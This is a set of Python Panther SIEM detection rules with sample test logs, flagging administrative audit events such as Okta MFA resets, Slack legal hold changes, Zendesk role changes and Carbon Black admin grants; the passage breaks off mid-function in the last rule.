from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_walk
from pypanther.log_types import PantherLogType

netskope_unauthorized_api_calls_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="True positive",
        ExpectedResult=True,
        Log={
            "_id": "1e589befa3da30132362f32a",
            "_insertion_epoch_timestamp": 1702318213,
            "audit_log_event": "Rest API V2 Call",
            "count": 1,
            "is_netskope_personnel": False,
            "organization_unit": "",
            "severity_level": 2,
            "supporting_data": {
                "data_type": "incidents",
                "data_values": [
                    403,
                    "POST",
                    "/api/v2/incidents/uba/getuci",
                    "trid=ccb898fgrhvdd0v0lebg",
                ],
            },
            "timestamp": "2023-12-11 18:10:13.000000000",
            "type": "admin_audit_logs",
            "ur_normalized": "service-account",
            "user": "service-account",
        },
    ),
    PantherRuleTest(
        Name="True negative",
        ExpectedResult=False,
        Log={
            "_id": "1e589befa3da30132362f32a",
            "_insertion_epoch_timestamp": 1702318213,
            "audit_log_event": "Rest API V2 Call",
            "count": 1,
            "is_netskope_personnel": False,
            "organization_unit": "",
            "severity_level": 2,
            "supporting_data": {
                "data_type": "incidents",
                "data_values": [
                    200,
                    "POST",
                    "/api/v2/incidents/uba/getuci",
                    "trid=ccb898fgrhvdd0v0lebg",
                ],
            },
            "timestamp": "2023-12-11 18:10:13.000000000",
            "type": "admin_audit_logs",
            "ur_normalized": "service-account",
            "user": "service-account",
        },
    ),
]


class NetskopeUnauthorizedAPICalls(PantherRule):
    RuleID = "Netskope.UnauthorizedAPICalls-prototype"
    DisplayName = "Netskope Many Unauthorized API Calls"
    LogTypes = [PantherLogType.Netskope_Audit]
    Tags = ["Netskope", "Configuration Required", "Brute Force"]
    Reports = {"MITRE ATT&CK": ["TA0006:T1110"]}
    Severity = PantherSeverity.High
    Description = "Many unauthorized API calls were observed for a user in a short period of time."
    Threshold = 10
    Runbook = "An account is making many unauthorized API calls.  This could indicate brute force activity, or expired service account credentials."
    Reference = "https://docs.netskope.com/en/netskope-help/data-security/netskope-private-access/private-access-rest-apis/"
    Tests = netskope_unauthorized_api_calls_tests

    def rule(self, event):
        data_values = deep_walk(event, "supporting_data", "data_values")
        if data_values and data_values[0] == 403:
            return True
        return False

    def title(self, event):
        user = event.get("user", "<USER_NOT_FOUND>")
        return f"Many unauthorized API calls from user [{user}]"



from typing import List

import pypanther.helpers.panther_event_type_helpers as event_type
from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import zendesk_get_roles
from pypanther.log_types import PantherLogType

zendesk_user_role_changed_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Zendesk - Role Changed",
        ExpectedResult=True,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user",
            "source_label": "Bob Cat",
            "action": "update",
            "change_description": "Role changed from Administrator to End User",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
    PantherRuleTest(
        Name="Zendesk - Admin Role Assigned",
        ExpectedResult=False,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user",
            "source_label": "Bob Cat",
            "action": "update",
            "change_description": "Role changed from End User to Administrator",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
]


class ZendeskUserRoleChanged(PantherRule):
    RuleID = "Zendesk.UserRoleChanged-prototype"
    DisplayName = "Zendesk User Role Changed"
    LogTypes = [PantherLogType.Zendesk_Audit]
    Severity = PantherSeverity.Info
    Description = "A user's Zendesk role was changed"
    Reference = "https://support.zendesk.com/hc/en-us/articles/4408824375450-Setting-roles-and-access-in-Zendesk-Admin-Center"
    SummaryAttributes = ["p_any_ip_addresses"]
    Tests = zendesk_user_role_changed_tests

    def rule(self, event):
        if event.get("source_type") == "user" and event.get("action") == "update":
            # admin roles have their own handling
            if event.udm("event_type") != event_type.ADMIN_ROLE_ASSIGNED:
                _, new_role = zendesk_get_roles(event)
                return bool(new_role)
        return False

    def title(self, event):
        old_role, new_role = zendesk_get_roles(event)
        return f"Actor user [{event.udm('actor_user')}] changed [{event.udm('user')}] role from {old_role} to {new_role}"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

one_login_high_risk_failed_login_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Normal Login Event",
        ExpectedResult=False,
        Log={
            "event_type_id": "6",
            "actor_user_id": 123456,
            "actor_user_name": "Bob Cat",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
    PantherRuleTest(
        Name="Failed High Risk Login",
        ExpectedResult=True,
        Log={
            "event_type_id": "6",
            "risk_score": 55,
            "actor_user_id": 123456,
            "actor_user_name": "Bob Cat",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
]


class OneLoginHighRiskFailedLogin(PantherRule):
    RuleID = "OneLogin.HighRiskFailedLogin-prototype"
    DisplayName = "OneLogin Failed High Risk Login"
    LogTypes = [PantherLogType.OneLogin_Events]
    Tags = ["OneLogin"]
    Severity = PantherSeverity.Low
    Description = (
        "A OneLogin attempt with a high risk factor (>50) resulted in a failed authentication."
    )
    Reference = "https://resources.onelogin.com/OneLogin_RiskBasedAuthentication-WP-v5.pdf"
    Runbook = "Investigate why this user login is tagged as high risk as well as whether this was caused by expected user activity."
    SummaryAttributes = ["account_id", "user_name", "user_id"]
    Tests = one_login_high_risk_failed_login_tests

    def rule(self, event):
        # check risk associated with this event
        if event.get("risk_score", 0) > 50:
            # a failed authentication attempt with high risk
            return str(event.get("event_type_id")) == "6"
        return False

    def title(self, event):
        return (
            f"A user [{event.get('user_name', '<UNKNOWN_USER>')}] failed a high risk login attempt"
        )



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import slack_alert_context
from pypanther.log_types import PantherLogType

slack_audit_logs_org_deleted_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Organization Deleted",
        ExpectedResult=True,
        Log={
            "action": "organization_deleted",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
    PantherRuleTest(
        Name="Organization Created",
        ExpectedResult=False,
        Log={
            "action": "organization_created",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
]


class SlackAuditLogsOrgDeleted(PantherRule):
    RuleID = "Slack.AuditLogs.OrgDeleted-prototype"
    DisplayName = "Slack Organization Deleted"
    LogTypes = [PantherLogType.Slack_AuditLogs]
    Tags = ["Slack", "Impact", "Account Access Removal"]
    Reports = {"MITRE ATT&CK": ["TA0040:T1531"]}
    Severity = PantherSeverity.Medium
    Description = "Detects when a Slack organization is deleted"
    Reference = "https://slack.com/intl/en-gb/help/articles/204067366-Delete-a-workspace"
    SummaryAttributes = ["p_any_ip_addresses", "p_any_emails"]
    Tests = slack_audit_logs_org_deleted_tests

    def rule(self, event):
        return event.get("action") == "organization_deleted"

    def alert_context(self, event):
        return slack_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_duo_helpers import duo_alert_context
from pypanther.log_types import PantherLogType

duo_admin_policy_updated_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Policy Update",
        ExpectedResult=True,
        Log={
            "action": "policy_update",
            "description": '{"adaptive_auth_display_unit": "days", "trusted_mobile_endpoint_policy": "no action", "adaptive_auth_hours": 0, "admin_email": "homer.simpson@simpsons.com", "allow_factor_u2f": false, "device_certificate_policy": "no action", "allow_factor_phone": false, "local_trusted_sessions_display_val": 0, "allow_adaptive_auth": false, "local_trusted_sessions_display_unit": "days", "allow_factor_sms": false}',
            "isotimestamp": "2022-02-21 21:48:48",
            "object": "Global Policy",
            "timestamp": "2022-02-21 21:48:48",
            "username": "Homer Simpson",
        },
    ),
    PantherRuleTest(
        Name="Other event",
        ExpectedResult=False,
        Log={
            "action": "admin_login",
            "description": '{"ip_address": "1.2.3.4", "device": "123-456-123", "factor": "sms", "saml_idp": "OneLogin", "primary_auth_method": "Single Sign-On"}',
            "isotimestamp": "2021-07-02 18:31:25",
            "timestamp": "2021-07-02 18:31:25",
            "username": "Homer Simpson",
        },
    ),
]


class DuoAdminPolicyUpdated(PantherRule):
    Description = "A Duo Administrator updated a Policy, which governs how users authenticate."
    DisplayName = "Duo Admin Policy Updated"
    Reference = "https://duo.com/docs/policy#authenticators-policy-settings"
    Severity = PantherSeverity.Medium
    LogTypes = [PantherLogType.Duo_Administrator]
    RuleID = "Duo.Admin.Policy.Updated-prototype"
    Tests = duo_admin_policy_updated_tests

    def rule(self, event):
        return event.get("action") == "policy_update"

    def title(self, event):
        return f"Duo: [{event.get('username', '<username_not_found>')}] updated [{event.get('object', 'Duo Policy')}]."

    def alert_context(self, event):
        return duo_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

zendesk_user_assumption_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="User assumption settings changed",
        ExpectedResult=True,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "account_setting",
            "source_label": "Account Assumption",
            "action": "update",
            "change_description": "Changed",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
    PantherRuleTest(
        Name="Zendesk - Credit Card Redaction On",
        ExpectedResult=False,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "account_setting",
            "source_label": "Credit Card Redaction",
            "action": "create",
            "change_description": "Enabled",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
]


class ZendeskUserAssumption(PantherRule):
    RuleID = "Zendesk.UserAssumption-prototype"
    DisplayName = "Enabled Zendesk Support to Assume Users"
    LogTypes = [PantherLogType.Zendesk_Audit]
    Tags = ["Zendesk", "Lateral Movement:Use Alternate Authentication Material"]
    Reports = {"MITRE ATT&CK": ["TA0008:T1550"]}
    Severity = PantherSeverity.Medium
    Description = "User enabled or disabled zendesk support user assumption."
    Runbook = "Investigate whether allowing zendesk support to assume users is necessary. If not, disable the feature.\n"
    Reference = "https://support.zendesk.com/hc/en-us/articles/4408894200474-Assuming-end-users#:~:text=In%20Support%2C%20click%20the%20Customers,user%20in%20the%20information%20dialog"
    SummaryAttributes = ["p_any_ip_addresses"]
    Tests = zendesk_user_assumption_tests
    USER_SUSPENSION_ACTIONS = {"create", "update"}

    def rule(self, event):
        return (
            event.get("source_type") == "account_setting"
            and event.get("action", "") in self.USER_SUSPENSION_ACTIONS
            and (
                event.get("source_label", "").lower()
                in {"account assumption", "assumption duration"}
            )
        )

    def title(self, event):
        return (
            f"A user [{event.udm('actor_user')}] updated zendesk support user assumption settings"
        )



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.helpers.panther_snyk_helpers import snyk_alert_context
from pypanther.log_types import PantherLogType

snyk_org_settings_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="placeholder",
        ExpectedResult=True,
        Log={
            "content": {
                "after": {
                    "integrationSettings": {
                        "autoDepUpgradeIgnoredDependencies": [],
                        "autoDepUpgradeLimit": 5,
                        "autoRemediationPrs": {"usePatchRemediation": True},
                        "isMajorUpgradeEnabled": True,
                        "manualRemediationPrs": {"useManualPatchRemediation": True},
                        "pullRequestAssignment": {
                            "assignees": ["github_handle", "github_handle2"],
                            "enabled": True,
                            "type": "manual",
                        },
                        "pullRequestTestEnabled": True,
                        "reachableVulns": {},
                    }
                },
                "before": {
                    "integrationSettings": {
                        "autoDepUpgradeIgnoredDependencies": [],
                        "autoDepUpgradeLimit": 5,
                        "autoRemediationPrs": {"usePatchRemediation": True},
                        "isMajorUpgradeEnabled": True,
                        "manualRemediationPrs": {"useManualPatchRemediation": True},
                        "pullRequestAssignment": {
                            "assignees": ["github_handle", "github_handle2"],
                            "enabled": True,
                            "type": "manual",
                        },
                        "reachableVulns": {},
                    }
                },
                "integrationPublicId": "81111111-cccc-4eee-bfff-3ccccccccccc",
                "interface": "ui",
            },
            "created": "2023-03-24 14:53:51.334",
            "event": "org.integration.settings.edit",
            "groupId": "8fffffff-1555-4444-b000-b55555555555",
            "orgId": "21111111-a222-4eee-8ddd-a99999999999",
            "userId": "05555555-3333-4ddd-8ccc-755555555555",
        },
    ),
    PantherRuleTest(
        Name="Snyk System SSO Setting event happened",
        ExpectedResult=False,
        Log={
            "userId": "05555555-3333-4ddd-8ccc-755555555555",
            "event": "group.sso.edit",
            "groupId": "8fffffff-1555-4444-b000-b55555555555",
            "orgId": "21111111-a222-4eee-8ddd-a99999999999",
            "content": {"unknown": "contents"},
        },
    ),
]


class SnykOrgSettings(PantherRule):
    RuleID = "Snyk.Org.Settings-prototype"
    DisplayName = "Snyk Org Settings"
    LogTypes = [PantherLogType.Snyk_GroupAudit, PantherLogType.Snyk_OrgAudit]
    Tags = ["Snyk"]
    Reference = "https://docs.snyk.io/snyk-admin/manage-settings/organization-general-settings"
    Severity = PantherSeverity.Medium
    Description = (
        "Detects when Snyk Organization settings, like Integrations and Webhooks, are changed\n"
    )
    SummaryAttributes = ["event"]
    Tests = snyk_org_settings_tests
    ACTIONS = [
        "org.integration.create",
        "org.integration.delete",
        "org.integration.edit",
        "org.integration.settings.edit",
        "org.request_access_settings.edit",
        "org.target.create",
        "org.target.delete",
        "org.webhook.add",
        "org.webhook.delete",
    ]

    def rule(self, event):
        action = deep_get(event, "event", default="<NO_EVENT>")
        return action in self.ACTIONS

    def title(self, event):
        group_or_org = "<GROUP_OR_ORG>"
        operation = "<NO_OPERATION>"
        action = deep_get(event, "event", default="<NO_EVENT>")
        if "." in action:
            group_or_org = action.split(".")[0].title()
            operation = ".".join(action.split(".")[1:]).title()
        return f"Snyk: [{group_or_org}] Setting [{operation}] performed by [{deep_get(event, 'userId', default='<NO_USERID>')}]"

    def alert_context(self, event):
        return snyk_alert_context(event)

    def dedup(self, event):
        return f"{deep_get(event, 'userId', default='<NO_USERID>')}{deep_get(event, 'orgId', default='<NO_ORGID>')}{deep_get(event, 'groupId', default='<NO_GROUPID>')}{deep_get(event, 'event', default='<NO_EVENT>')}"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import okta_alert_context
from pypanther.log_types import PantherLogType

okta_user_mfa_reset_all_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Reset All Event",
        ExpectedResult=True,
        Log={
            "actor": {
                "alternateId": "homer.simpson@duff.com",
                "displayName": "Homer Simpson",
                "id": "00abc123",
                "type": "User",
            },
            "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "100-abc-9999"},
            "client": {
                "device": "Computer",
                "geographicalContext": {
                    "city": "Springfield",
                    "country": "United States",
                    "geolocation": {"lat": 20, "lon": -25},
                    "postalCode": "12345",
                    "state": "Ohio",
                },
                "ipAddress": "1.3.2.4",
                "userAgent": {
                    "browser": "CHROME",
                    "os": "Mac OS X",
                    "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
                },
                "zone": "null",
            },
            "debugcontext": {
                "debugData": {
                    "requestId": "AbCdEf12G",
                    "requestUri": "/api/v1/users/AbCdEfG/lifecycle/reset_factors",
                    "url": "/api/v1/users/AbCdEfG/lifecycle/reset_factors?",
                }
            },
            "displaymessage": "Reset all factors for user",
            "eventtype": "user.mfa.factor.reset_all",
            "legacyeventtype": "core.user.factor.reset_all",
            "outcome": {"result": "SUCCESS"},
            "published": "2022-06-22 18:18:29.015",
            "request": {
                "ipChain": [
                    {
                        "geographicalContext": {
                            "city": "Springfield",
                            "country": "United States",
                            "geolocation": {"lat": 20, "lon": -25},
                            "postalCode": "12345",
                            "state": "Ohio",
                        },
                        "ip": "1.3.2.4",
                        "version": "V4",
                    }
                ]
            },
            "securitycontext": {
                "asNumber": 701,
                "asOrg": "verizon",
                "domain": "verizon.net",
                "isProxy": False,
                "isp": "verizon",
            },
            "severity": "INFO",
            "target": [
                {
                    "alternateId": "peter.griffin@company.com",
                    "displayName": "Peter Griffin",
                    "id": "0002222AAAA",
                    "type": "User",
                }
            ],
            "transaction": {"detail": {}, "id": "ABcDeFgG", "type": "WEB"},
            "uuid": "AbC-123-XyZ",
            "version": "0",
        },
    ),
    PantherRuleTest(
        Name="Other Event",
        ExpectedResult=False,
        Log={
            "actor": {
                "alternateId": "homer.simpson@duff.com",
                "displayName": "Homer Simpson",
                "id": "00abc456",
                "type": "User",
            },
            "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "abc12345"},
            "client": {
                "device": "Unknown",
                "ipAddress": "1.2.3.4",
                "userAgent": {"browser": "UNKNOWN", "os": "Unknown", "rawUserAgent": "Chrome"},
                "zone": "null",
            },
            "debugcontext": {"debugData": {}},
            "eventtype": "application.integration.rate_limit_exceeded",
            "legacyeventtype": "app.api.error.rate.limit.exceeded",
            "outcome": {"result": "SUCCESS"},
            "published": "2022-06-10 17:19:58.423",
            "request": {},
            "securitycontext": {},
            "severity": "INFO",
            "target": [
                {"alternateId": "App ", "displayName": "App", "id": "12345", "type": "AppInstance"}
            ],
            "transaction": {"detail": {}, "id": "sdfg", "type": "JOB"},
            "uuid": "aaa-bb-ccc",
            "version": "0",
        },
    ),
]


class OktaUserMFAResetAll(PantherRule):
    Description = "All MFA factors have been reset for a user."
    DisplayName = "Okta User MFA Reset All"
    Reference = "https://help.okta.com/en-us/content/topics/security/mfa/mfa-reset-users.htm#:~:text=the%20Admin%20Console%3A-,In%20the%20Admin%20Console%2C%20go%20to%20DirectoryPeople.,Selected%20Factors%20or%20Reset%20All"
    Severity = PantherSeverity.Low
    LogTypes = [PantherLogType.Okta_SystemLog]
    RuleID = "Okta.User.MFA.Reset.All-prototype"
    Tests = okta_user_mfa_reset_all_tests

    def rule(self, event):
        return event.get("eventtype") == "user.mfa.factor.reset_all"

    def title(self, event):
        return f"Okta: All MFA factors were reset for [{event.get('target', [{}])[0].get('alternateId', '<id-not-found>')}] by [{event.get('actor', {}).get('alternateId', '<id-not-found>')}]"

    def alert_context(self, event):
        return okta_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get, slack_alert_context
from pypanther.log_types import PantherLogType

slack_audit_logs_legal_hold_policy_modified_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Legal Hold - Entities Deleted",
        ExpectedResult=True,
        Log={
            "action": "legal_hold_policy_entities_deleted",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
    PantherRuleTest(
        Name="Legal Hold - Exclusions Added",
        ExpectedResult=True,
        Log={
            "action": "legal_hold_policy_exclusion_added",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
    PantherRuleTest(
        Name="Legal Hold - Policy Released",
        ExpectedResult=True,
        Log={
            "action": "legal_hold_policy_released",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
    PantherRuleTest(
        Name="Legal Hold - Policy Updated",
        ExpectedResult=True,
        Log={
            "action": "legal_hold_policy_updated",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "A012B3CDEFG",
                    "name": "username",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace",
                    "id": "T01234N56GB",
                    "name": "test-workspace",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
        },
    ),
    PantherRuleTest(
        Name="User Logout",
        ExpectedResult=False,
        Log={
            "action": "user_logout",
            "actor": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "W012J3FEWAU",
                    "name": "primary-owner",
                    "team": "T01234N56GB",
                },
            },
            "context": {
                "ip_address": "1.2.3.4",
                "location": {
                    "domain": "test-workspace-1",
                    "id": "T01234N56GB",
                    "name": "test-workspace-1",
                    "type": "workspace",
                },
                "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
            },
            "date_create": "2022-07-28 15:22:32",
            "entity": {
                "type": "user",
                "user": {
                    "email": "user@example.com",
                    "id": "W012J3FEWAU",
                    "name": "primary-owner",
                    "team": "T01234N56GB",
                },
            },
            "id": "72cac009-9eb3-4dde-bac6-ee49a32a1789",
        },
    ),
]


class SlackAuditLogsLegalHoldPolicyModified(PantherRule):
    RuleID = "Slack.AuditLogs.LegalHoldPolicyModified-prototype"
    DisplayName = "Slack Legal Hold Policy Modified"
    LogTypes = [PantherLogType.Slack_AuditLogs]
    Tags = ["Slack", "Defense Evasion", "Impair Defenses", "Disable or Modify Tools"]
    Reports = {"MITRE ATT&CK": ["TA0005:T1562.001"]}
    Severity = PantherSeverity.High
    Description = "Detects changes to configured legal hold policies"
    Reference = (
        "https://slack.com/intl/en-gb/help/articles/4401830811795-Create-and-manage-legal-holds"
    )
    SummaryAttributes = ["p_any_ip_addresses", "p_any_emails"]
    Tests = slack_audit_logs_legal_hold_policy_modified_tests
    LEGAL_HOLD_POLICY_ACTIONS = {
        "legal_hold_policy_entities_deleted": "Slack Legal Hold Policy Entities Deleted",
        "legal_hold_policy_exclusion_added": "Slack Exclusions Added to Legal Hold Policy",
        "legal_hold_policy_released": "Slack Legal Hold Released",
        "legal_hold_policy_updated": "Slack Legal Hold Updated",
    }

    def rule(self, event):
        return event.get("action") in self.LEGAL_HOLD_POLICY_ACTIONS

    def title(self, event):
        # Only the `legal_hold_policy_updated` event includes relevant data to deduplicate
        if event.get("action") == "legal_hold_policy_updated":
            return f"Slack Legal Hold Updated [{deep_get(event, 'details', 'old_legal_hold_policy', 'name')}]"
        if event.get("action") in self.LEGAL_HOLD_POLICY_ACTIONS:
            return self.LEGAL_HOLD_POLICY_ACTIONS.get(event.get("action"))
        return "Slack Legal Hold Policy Modified"

    def alert_context(self, event):
        return slack_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.helpers.panther_tines_helpers import tines_alert_context
from pypanther.log_types import PantherLogType

tines_actions_disabled_changes_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Tines Actions Disabled Change",
        ExpectedResult=True,
        Log={
            "created_at": "2023-05-23 23:16:41",
            "id": 7111111,
            "operation_name": "ActionsDisabledChange",
            "request_ip": "12.12.12.12",
            "request_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
            "tenant_id": "8888",
            "user_email": "user@company.com",
            "user_id": "17171",
            "user_name": "user at company dot com",
        },
    ),
    PantherRuleTest(
        Name="Tines Login",
        ExpectedResult=False,
        Log={
            "created_at": "2023-05-17 14:45:19",
            "id": 7888888,
            "operation_name": "Login",
            "request_ip": "12.12.12.12",
            "request_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
            "tenant_id": "8888",
            "user_email": "user@company.com",
            "user_id": "17171",
            "user_name": "user at company dot com",
        },
    ),
]


class TinesActionsDisabledChanges(PantherRule):
    RuleID = "Tines.Actions.DisabledChanges-prototype"
    DisplayName = "Tines Actions Disabled Change"
    LogTypes = [PantherLogType.Tines_Audit]
    Tags = ["Tines"]
    Reference = "https://www.tines.com/university/tines-basics/architecture-of-an-action"
    Severity = PantherSeverity.Medium
    Description = "Detections when Tines Actions are set to Disabled Change\n"
    SummaryAttributes = ["user_id", "operation_name", "tenant_id", "request_ip"]
    Tests = tines_actions_disabled_changes_tests
    ACTIONS = ["ActionsDisabledChange"]

    def rule(self, event):
        action = deep_get(event, "operation_name", default="<NO_OPERATION_NAME>")
        return action in self.ACTIONS

    def title(self, event):
        action = deep_get(event, "operation_name", default="<NO_OPERATION_NAME>")
        actor = deep_get(event, "user_email", default="<NO_USERNAME>")
        return f"Tines: {action} by {actor}"

    def alert_context(self, event):
        return tines_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

carbon_black_audit_admin_grant_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Super Admin granted",
        ExpectedResult=True,
        Log={
            "clientIp": "12.34.56.78",
            "description": "Created grant: psc:cnn:A1234567:BC1234567890 with role Super Admin",
            "eventId": "66443924833011eeac3cb393f3d07f9f",
            "eventTime": "2023-11-14 20:57:19.186000000",
            "flagged": False,
            "loginName": "bob.ross@acme.com",
            "orgName": "acme.com",
            "requestUrl": "/access/v2/orgs/A1234567/grants",
            "verbose": False,
        },
    ),
    PantherRuleTest(
        Name="Admin granted",
        ExpectedResult=True,
        Log={
            "clientIp": "12.34.56.78",
            "description": "Created grant: psc:cnn:A1234567:BC1234567890 with role Administrator",
            "eventId": "66443924833011eeac3cb393f3d07f9f",
            "eventTime": "2023-11-14 20:57:19.186000000",
            "flagged": False,
            "loginName": "bob.ross@acme.com",
            "orgName": "acme.com",
            "requestUrl": "/access/v2/orgs/A1234567/grants",
            "verbose": False,
        },
    ),
    PantherRuleTest(
        Name="Other role granted",
        ExpectedResult=False,
        Log={
            "clientIp": "12.34.56.78",
            "description": "Created grant: psc:cnn:A1234567:BC1234567890 with role Read Only",
            "eventId": "66443924833011eeac3cb393f3d07f9f",
            "eventTime": "2023-11-14 20:57:19.186000000",
            "flagged": False,
            "loginName": "bob.ross@acme.com",
            "orgName": "acme.com",
            "requestUrl": "/access/v2/orgs/A1234567/grants",
            "verbose": False,
        },
    ),
]


class CarbonBlackAuditAdminGrant(PantherRule):
    RuleID = "CarbonBlack.Audit.Admin.Grant-prototype"
    LogTypes = [PantherLogType.CarbonBlack_Audit]
    Description = "Detects when a user is granted Admin or Super Admin permissions."
    DisplayName = "Carbon Black Admin Role Granted"
    Severity = PantherSeverity.High
    Tags = ["Privilege Escalation", "Account Manipulation"]
    Reports = {"MITRE ATT&CK": ["TA0004:T1098"]}
    Reference = "https://docs.vmware.com/en/VMware-Carbon-Black-Cloud/services/carbon-black-cloud-user-guide/GUID-CF5ACD2C-A534-46C8-AE06-E1884DB37B58.html"
    Tests = carbon_black_audit_admin_grant_tests
    PREFIXES = ("Updated grant: ", "Created grant: ")

    def rule(self, event):
        desc = event.get("description", "")
        return all(
            [
